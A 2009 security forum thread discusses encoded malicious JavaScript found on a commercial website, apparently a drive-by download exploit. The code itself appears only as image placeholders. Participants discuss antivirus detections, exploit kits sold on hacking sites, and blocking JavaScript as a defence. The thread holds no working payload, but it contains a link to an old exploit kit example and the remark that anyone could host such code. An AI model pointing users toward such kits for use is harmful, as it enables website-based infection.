A Drive-by Download Threat?

Discussion in 'malware problems & news' started by Neoing, May 6, 2009.

Thread Status:
Not open for further replies.
  1. Neoing

    Neoing Registered Member

    Joined:
    Mar 3, 2009
    Posts:
    10
    Hi Guys,

    I went into a site recently and got prompted by AVG that the site contains a link to an exploit site. I checked with AVG support and they also said that there is a piece of code which is malicious.

    The code is as follows:

    exploit-code-encoded.jpg

    Can anyone decode what this means and what threat does it poses to users visiting the site?

    Many Thanks in advance!



    Note from LWM: This is what the above encoded text converts to when you decode it:

    exploit-code-decoded.jpg

    Note: avast! triggered just on the appearance of the text in the post. Avira also triggered when copying the text and pasting into a webpage form, like a search box. These are weak signature detections since as "text only" this is harmless. If you execute the Javascript of it though, (which you can not do in a vBulletin forum, therefore you must manipulate it yourself outside the forum to run it), then yes, you could infect yourself.
     
    Last edited by a moderator: May 7, 2009
  2. innerpeace

    innerpeace Registered Member

    Joined:
    Jan 15, 2007
    Posts:
    2,095
    Location:
    Mountaineer Country
    I'm not sure what it does but when I searched for it, I got an alert from Avira.
    http://www.avira.com/en/threats/section/fulldetails/id_vir/4221/html_dldr.iframe.dp.html

    I think maybe Avira was picking it up because of the copy/paste I did. I would advise anyone not to copy and paste the above code without the adequate protection and knowledge.

    I'm still getting alerts so don't mess with this!

    Edit: Here was the location of the file Avira detected.
    C:\Sandbox\Owner\DefaultBox\user\current\Application Data\Mozilla\Firefox\Profiles\c3xl6613.default\formhistory.sqlite
     
    Last edited: May 7, 2009
  3. vlk

    vlk AV Expert

    Joined:
    Dec 26, 2002
    Posts:
    618
    What does the fact that Avast and Avira warn on these snippets have to do with these being "weak signature detections"?

    You're talking about two completely unrelated things.

    It's like on-access file scanning. Some AV's warn if you just open an infected EXE file (e.g. open the containing folder in Explorer), others only warn when you try to execute it. But the method of detection can be just arbitrary...


    Cheers
    Vlk
     
  4. Neoing

    Neoing Registered Member

    Joined:
    Mar 3, 2009
    Posts:
    10

    Seems that this threat is pretty threatening. I tested entering the site with NAV 2009 but it doesn't detect anything. I got my friends to enter the site as well with other AV and there isn't any prompt as well. If anyone wants the site, please PM me as this site is a commercial site.

    I hope this will not affect the other users visiting the site. Any AVG users or out there willing to give this site a try? PM me.

    Thanks.
     
  5. innerpeace

    innerpeace Registered Member

    Joined:
    Jan 15, 2007
    Posts:
    2,095
    Location:
    Mountaineer Country
    In an effort to learn, could either set of the above scripts be inserted into a simple web page in an attempt to infect a user?

    Are there any other ways a user can execute the script?
     
  6. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Unfortunately, this is all too easy, since these exploits are sold as packages on hacking sites. Here is an old one, which uses the exact same code except for the URL to connect to the hacker's server:

    http://www.urs2.net/rsj/computing/tests/gpack

    So, it is evident that this exploit code has been in circulation for a while. In the current Radio stations exploit, because the same code appears on all of the Watch pages suggests some type of code injection which targeted those specific pages on the server. The URL in the malicious javascript code no longer works.

    So, you could put this code in a web page on your server and those who view it without proper protection would be exploited.

    Note that because it is javascript code, that controlling javascript in the browser nullifies the attack.

    ----
    rich
     
  7. innerpeace

    innerpeace Registered Member

    Joined:
    Jan 15, 2007
    Posts:
    2,095
    Location:
    Mountaineer Country
    Thanks for the explanation and link Rmus. What you wrote was easy to understand :thumb:.
     
Loading...
Thread Status:
Not open for further replies.